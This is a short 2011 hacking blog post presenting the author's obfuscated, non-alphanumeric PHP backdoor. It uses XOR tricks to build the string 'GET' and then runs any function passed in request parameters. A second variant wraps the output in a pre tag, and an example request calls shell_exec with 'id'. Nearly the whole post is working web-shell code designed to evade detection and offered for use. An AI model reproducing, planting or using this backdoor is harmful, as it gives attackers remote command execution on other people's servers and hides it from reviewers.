2011
09.24

Non-alphanumeric PHP Simple Backdoor

Category: Hacking, Tools, Web Hacking / Tag:  / Add Comment

After read and learn about non-alphanumeric code in php, i decide to write my own non-alphanumeric PHP simple backdoor.

<?
$_="{"; #XOR char
$_=($_^"<").($_^">").($_^"/"); #XOR = GET
?>
<?=${'_'.$_}["_"](${'_'.$_}["__"]);?>

well, it’s a quite simple program, it’s just a XOR function over strings. By XOR-ing “<>/” with “{” we have “GET” string as the result.
put the result in one-liner code execution and done.

Another version with “<pre>” tag.

<?
$_="{"; #XOR char
$__=($_^"+").($_^")").($_^">"); #XOR = PRE
$_=($_^"<").($_^">").($_^"/"); #XOR = GET
?>
<?="<".$__.">".${'_'.$_}["_"](${'_'.$_}["__"]);?>
execution:
blabla.php?_=shell_exec&__=id

Related Post

No Comment.

Add Your Comment

Your Comment